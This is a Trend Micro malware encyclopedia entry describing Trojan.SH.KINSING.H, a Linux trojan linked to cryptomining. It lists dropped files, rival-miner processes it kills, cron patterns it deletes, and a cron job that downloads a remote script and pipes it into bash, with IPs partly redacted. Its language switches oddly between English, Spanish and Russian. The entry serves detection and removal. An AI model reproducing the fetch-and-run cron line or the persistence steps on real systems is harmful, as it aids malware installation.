Author: Warren Adam Sto. Tomas   

 PLATFORM:

Linux

 OVER ALL RISK RATING:
 DAMAGE POTENTIAL::
 DISTRIBUTION POTENTIAL::
 REPORTED INFECTION:
 Beeinträchtigung der Systemleistung ::
 INFORMATION EXPOSURE:
Low
Medium
High
Critical

  • Threat Type:
    Trojan

  • Destructiveness:
    No

  • Encrypted:
    No

  • In the wild::
    Yes

  OVERVIEW

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Elimina archivos para impedir la ejecución correcta de programas y aplicaciones.

  TECHNICAL DETAILS

File size: 11,308 bytes
File type: Other
Memory resident: No
INITIAL SAMPLES RECEIVED DATE: 12 de декабря de 2021

Detalles de entrada

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Instalación

Infiltra los archivos siguientes:

  • If ran as root:
    • /etc/kinsing
  • If not ran as root, any of the following:
    • /tmp/kinsing
    • /var/tmp/kinsing
    • /dev/shm/kinsing
  • /proc/sys/kernel/nmi_watchdog
  • /etc/sysctl.conf

Otras modificaciones del sistema

Elimina los archivos siguientes:

  • /etc/ld.so.preload

Finalización del proceso

Finaliza los procesos siguientes si detecta que se ejecutan en la memoria del sistema afectado:

  • .git/kthreaddw
  • {BLOCKED}.206.105
  • {BLOCKED}.87.6
  • p8444
  • supportxmr
  • monero
  • kthreaddi
  • srv00
  • /tmp/.javae/javae
  • .javae
  • .syna
  • .main
  • xmm
  • solr.sh
  • /tmp/.solr/solrd
  • /tmp/javac
  • /tmp/.go.sh
  • /tmp/.x/agetty
  • /tmp/.x/kworker
  • c3pool
  • /tmp/.X11-unix/gitag-ssh
  • /tmp/1
  • /tmp/okk.sh
  • /tmp/gitaly
  • /tmp/.x/kworker
  • 43a6eY5zPm3UFCaygfsukfP94ZTHz6a1kZh5sm1aZFB
  • /tmp/.X11-unix/supervise
  • /tmp/.ssh/redis.sh
  • zsvc
  • pdefenderd
  • updatecheckerd
  • cruner
  • dbused
  • bashirc
  • meminitsrv
  • Process connecting to {BLOCKED}.87.6, no "-"
  • Process connecting to 127.0.0.1:52018, no "-"
  • Process connecting to {BLOCKED}.218.76:9486, no "-"
  • Process connecting to {BLOCKED}.28.216:9486, no "-"
  • Process with 8 characters in its process name, does not have bin, or does not have [, or does not have (, or does not have php-fpm, or does not have proxyma, or does not have postgres, or does not have postgrey, or does not have kinsing
  • Process with 8 characters in its process name, does not have bin, or does not have [, or does not have (, or does not have php-fpm, or does not have proxyma, or does not have postgres, or does not have postgrey
  • Process with 16 characters in its process name, does not have bin, or does not have [, or does not have (, or does not have php-fpm, or does not have proxyma, or does not have postgres, or does not have postgrey
  • Process with string "./oka", no grep
  • Process with string "postgres: autovacum", no grep
  • Process with string "/tmp/sscks", no grep
  • Process with string "agetty", no grep
  • {BLOCKED}.28.216
  • Process found in the following files:
    • /tmp/.X11-unix/01
    • /tmp/.X11-unix/11
    • /tmp/.X11-unix/22
    • /tmp/.pg_stat.0
    • /tmp/.pg_stat.1
    • $HOME/data/./oka.pid

Otros detalles

Hace lo siguiente:

  • Delete cron jobs with the following strings:
    • /base64/d
    • /_cron/d
    • /{BLOCKED}.20.181/d
    • /update.sh/d
    • /logo4/d
    • /logo9/d
    • /logo0/d
    • /logo/d
    • /tor2web/d
    • /jpg/d
    • /png/d
    • /tmp/d
    • /zmreplchkr/d
    • /aliyun.one/d
    • /{BLOCKED}.110.66.one/d
    • /pastebin/d
    • /onion/d
    • /lsd.systemten.org/d
    • /shuf/d
    • /ash/d
    • /mr.sh/d
    • /{BLOCKED}.10.234/d
    • /localhost.xyz/d
    • /{BLOCKED}.151.106/d
    • /{BLOCKED}.159.106/d
    • /github/d
    • /bi{BLOCKED}k.com/d
    • /xmr.i{BLOCKED}e.com/d
    • /{BLOCKED}.10.234/d
    • /{BLOCKED}.79.230/d
    • /{BLOCKED}.164.83/d
    • /newdat.sh/d
    • /lib.p{BLOCKED}m.com /d
    • /t.a{BLOCKED}.com/d
    • /update.sh/d
    • /systemd-service.sh/d
    • /pg_stat.sh/d
    • /sleep/d
    • /oka/d
    • /linux1213/d
    • /#wget/d
    • /#curl/d
    • /zsvc/d
    • /givemexyz/d
    • /world/d
    • /1.sh/d
    • /3.sh/d
    • /workers/d
    • /oracleservice/d
  • Adds the following cron job:
    • http://{BLOCKED}.32.198/lh.sh | bash > /dev/null 2>&1
  • It installs the following service:
    • /lib/systemd/system/bot.service
  • It deletes the command history.
  • It tries to install curl, wget, cron if they do not exist in the affected system

  SOLUTION

Minimum scan engine: 9.800
First VSAPI Pattern File: 17.248.05
First VSAPI Pattern Release Date: 12 de декабря de 2021
VSAPI OPR PATTERN-VERSION: 17.249.00
VSAPI OPR PATTERN DATE: 13 de декабря de 2021

Explorar el equipo con su producto de Trend Micro para eliminar los archivos detectados como Trojan.SH.KINSING.H En caso de que el producto de Trend Micro ya haya limpiado, eliminado o puesto en cuarentena los archivos detectados, no serán necesarios más pasos. Puede optar simplemente por eliminar los archivos en cuarentena. Consulte esta página de Base de conocimientos para obtener más información.


Did this description help? Tell us how we did.